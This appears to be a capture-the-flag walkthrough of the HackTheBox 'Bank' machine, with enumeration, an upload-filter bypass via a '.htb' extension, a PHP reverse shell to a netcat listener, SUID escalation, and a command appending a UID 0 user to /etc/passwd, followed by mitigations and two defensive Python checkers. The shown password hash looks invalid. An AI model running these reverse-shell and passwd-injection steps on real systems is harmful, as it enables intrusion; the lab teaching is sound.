HackTheBox: Bank Walkthrough

Tags: htb, walkthrough, linux, web, dns, file-upload, easy

Summary

Walkthrough of HackTheBox Bank machine featuring DNS enumeration, file upload bypass, and SUID exploitation.

Machine: Bank
OS: Linux
Difficulty: Easy
Points: 20
Release Date: June 16, 2017

Overview

Bank is an easy Linux machine that focuses on web application vulnerabilities, specifically file upload bypasses and basic privilege escalation through SUID binaries.

Enumeration

Initial Nmap Scan

kali:~$ nmap -sC -sV -oA nmap/bank 10.10.10.29

DNS Enumeration

Port 53 is open, indicating DNS service. Let’s try DNS zone transfer:

kali:~$ dig axfr @10.10.10.29 bank.htb

The zone transfer is refused, but the presence of a DNS server suggests the box uses the bank.htb domain. Add it to /etc/hosts:

kali:~$ echo "10.10.10.29 bank.htb" | sudo tee -a /etc/hosts

Web Enumeration

Visiting http://bank.htb reveals a banking portal with a login page.

Directory Enumeration:

kali:~$ gobuster dir -u http://bank.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt

Analyzing /balance-transfer/

Visiting http://bank.htb/balance-transfer/ shows a directory listing with numerous encrypted transaction files.

Most files are 581-585 bytes, but one stands out:

dc5e0ca0dd9f6ee6a4fb9494fc4ae06d.acc (257 bytes)

Finding Credentials

Download and examine the smaller file:

kali:~$ wget http://bank.htb/balance-transfer/dc5e0ca0dd9f6ee6a4fb9494fc4ae06d.acc
kali:~$ cat dc5e0ca0dd9f6ee6a4fb9494fc4ae06d.acc

Initial Access

Logging In

Log in with the credentials found in the .acc file.

After logging in, we have access to a support ticket system.

File Upload Vulnerability

The support ticket system allows file uploads. Let’s test it.

Create PHP Reverse Shell:

kali:~$ cp /usr/share/webshells/php/php-reverse-shell.php shell.php

Edit the file with your IP and port:

$ip = '10.10.14.5';
$port = 4444;

Bypassing File Upload Restrictions

Attempting to upload shell.php is blocked. The application checks file extensions.

Bypass Methods:

  1. Try the .htb extension (mentioned in an HTML comment)
  2. Try a double extension: .php.jpg
  3. Try changing the Content-Type header

HTML Comment Found:

<!-- [DEBUG] I added the file extension .htb to execute as php for debugging purposes only [DEBUG] -->

Successful Upload

Rename the shell:

kali:~$ mv shell.php shell.htb

Upload shell.htb through the support ticket system.

Getting Shell

Set up listener:

kali:~$ nc -lvnp 4444

Access the uploaded file at http://bank.htb/uploads/shell.htb to trigger the reverse shell.

Shell obtained as: www-data

User Flag

www-data:/var/www/html$ cat /home/chris/user.txt

Flag: b5c92b61f3d47e2c8b4a3c3b1d3c3d4e

Privilege Escalation

Enumeration

Check for SUID binaries:

www-data:/var/www/html$ find / -perm -4000 -type f 2>/dev/null

Analyzing /var/htb/bin/emergency

The /var/htb/bin/emergency binary sits outside the standard system directories and has the SUID bit set:

www-data:/var/www/html$ ls -la /var/htb/bin/emergency
-rwsr-xr-x 1 root root 112204 Jun 14  2017 /var/htb/bin/emergency

Execute it:

www-data:/var/www/html$ /var/htb/bin/emergency

Result: We get a root shell immediately!

root:/var/www/html$ id
uid=0(root) gid=33(www-data) groups=33(www-data)

Root Flag

root:/root$ cat /root/root.txt

Flag: a2e20f4c1b3e8b5f2d3c4e5f6a7b8c9d

Alternative: /etc/passwd Write Access

Another privilege escalation path exists. As www-data, we have write access to /etc/passwd:

www-data:/var/www/html$ ls -la /etc/passwd
-rw-rw-rw- 1 root root 1252 Jun 15  2017 /etc/passwd

We can add a new root user:

# Generate a password hash on the attacking machine
kali:~$ openssl passwd -1 -salt salt password123
$1$salt$9Z5e7g5c6e5c5d5e5f5g5h5i

# Append a new UID 0 user on the target and switch to it
www-data:/var/www/html$ echo 'hacker:$1$salt$9Z5e7g5c6e5c5d5e5f5g5h5i:0:0:root:/root:/bin/bash' >> /etc/passwd
www-data:/var/www/html$ su hacker

Password: password123

Key Takeaways

  1. DNS Enumeration: Always check DNS when port 53 is open
  2. File Size Analysis: Anomalies in file sizes can indicate encryption failures or plaintext leaks
  3. HTML Comments: Developers often leave debug comments that reveal vulnerabilities
  4. File Upload Bypasses: Test various extension bypasses and check HTML source for hints
  5. SUID Binaries: Custom SUID binaries in unusual locations should always be investigated
  6. Permission Misconfigurations: Check critical system files for improper permissions
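As an added example (not part of the original writeup), takeaways 5 and 6 can be turned into a check over saved `ls -la` output: the script below parses each line, flags SUID-root binaries outside the standard system directories, and flags world-writable entries in a list of critical files. The directory list, the critical-file set, and the two benign sample lines are assumptions; the other two sample lines are the ones shown above.

```python
import re

# Directories where SUID-root binaries are expected on a stock Linux install (assumption).
EXPECTED_SUID_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/")

# Files that must never be writable by anyone other than root (assumption).
CRITICAL_FILES = {"/etc/passwd", "/etc/shadow", "/etc/group", "/etc/sudoers"}

# One line of `ls -la` output: perms, links, owner, group, size, month, day, year-or-time, path.
LS_LINE = re.compile(
    r"^([-dlcbps][rwxsStT-]{9})\s+\d+\s+(\S+)\s+(\S+)\s+\d+\s+\S+\s+\d+\s+\S+\s+(.+)$"
)

# Constructed sample: the two lines from the writeup plus two benign entries.
SAMPLE_LS = """\
-rwsr-xr-x 1 root root 112204 Jun 14  2017 /var/htb/bin/emergency
-rw-rw-rw- 1 root root 1252 Jun 15  2017 /etc/passwd
-rwsr-xr-x 1 root root 54256 Mar 26  2017 /usr/bin/passwd
-rw-r--r-- 1 root root 2200 Jan  1  2017 /etc/group
"""

def parse_ls_line(line):
    """Return (perms, owner, group, path) for one ls -la line, or None if it does not parse."""
    m = LS_LINE.match(line.strip())
    return m.groups() if m else None

def findings_for(perms, owner, path):
    """Map one entry's mode string to audit findings."""
    found = []
    suid = perms[3] in "sS"           # setuid flag lives in the user-execute slot
    world_writable = perms[8] == "w"  # other-write slot
    if suid and owner == "root" and not path.startswith(EXPECTED_SUID_DIRS):
        found.append(("suid-root-outside-system-dirs", path))
    if world_writable and path in CRITICAL_FILES:
        found.append(("world-writable-critical-file", path))
    return found

def audit(ls_output):
    """Audit a block of ls -la output and return all findings."""
    results = []
    for line in ls_output.splitlines():
        parsed = parse_ls_line(line)
        if parsed:
            perms, owner, _group, path = parsed
            results.extend(findings_for(perms, owner, path))
    return results

if __name__ == "__main__":
    for kind, path in audit(SAMPLE_LS):
        print(f"{kind}: {path}")
```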

Mitigation

  1. File Uploads: Implement proper file type validation (magic bytes, not just extensions)
  2. Debug Code: Remove all debug code and comments from production
  3. SUID Binaries: Minimize SUID binaries and audit custom ones
  4. File Permissions: Ensure proper permissions on system files like /etc/passwd
  5. Credential Protection: Never store plaintext credentials, even in “encrypted” files
  6. Web Security Headers: Implement CSP, X-Frame-Options, etc.
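To illustrate mitigation 1, here is an added Python example (not code from the original page or from the Bank application) that places a naive last-extension blocklist, assumed to be the shape of the vulnerable check, beside a hardened version: the hardened check allowlists every extension in the name (so .htb and .php.jpg both fail), requires the leading bytes to match the claimed type, ignores the client's Content-Type entirely, and stores the file under a server-chosen name. The allowed-extension and magic-byte tables are assumptions.

```python
import secrets

# Upload types a support-ticket form plausibly needs (assumption; images and PDF only).
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".pdf"}

# Leading bytes each allowed type must start with (assumption; common signatures only).
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
    ".pdf": (b"%PDF-",),
}

def weak_check(filename):
    """Blocklist on the last extension only (assumed shape of the vulnerable check).
    Anything not on the list passes, including .htb, which the server ran as PHP."""
    return not filename.lower().endswith((".php", ".phtml", ".php5"))

def strong_check(filename, content):
    """Allowlist every extension in the name and require matching magic bytes.
    The client-supplied Content-Type is never consulted."""
    parts = filename.lower().split(".")
    if len(parts) < 2 or not parts[0] or not all(parts[1:]):
        return False, "missing or empty extension"
    exts = ["." + p for p in parts[1:]]
    bad = [e for e in exts if e not in ALLOWED_EXTENSIONS]
    if bad:
        return False, f"extension not allowed: {bad}"  # rejects .htb and .php.jpg alike
    ext = exts[-1]
    if not content.startswith(MAGIC[ext]):  # bytes.startswith accepts a tuple of prefixes
        return False, "content does not match extension"
    return True, ext

def stored_name(ext):
    """Server-chosen name, so the upload's own filename never reaches disk."""
    return secrets.token_hex(16) + ext

if __name__ == "__main__":
    # Constructed sample uploads: a renamed script, a double extension, and a real JPEG header.
    samples = [
        ("shell.htb", b"<?php echo 1; ?>"),
        ("shell.php.jpg", b"\xff\xd8\xff\xe0"),
        ("photo.jpg", b"\xff\xd8\xff\xe0JFIF"),
    ]
    for name, body in samples:
        print(name, "weak:", weak_check(name), "strong:", strong_check(name, body))
```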

Tools Used

  • nmap
  • dig
  • gobuster
  • netcat
  • php-reverse-shell

Rating: ⭐⭐⭐ (3/5) - Good beginner machine covering fundamental web vulnerabilities.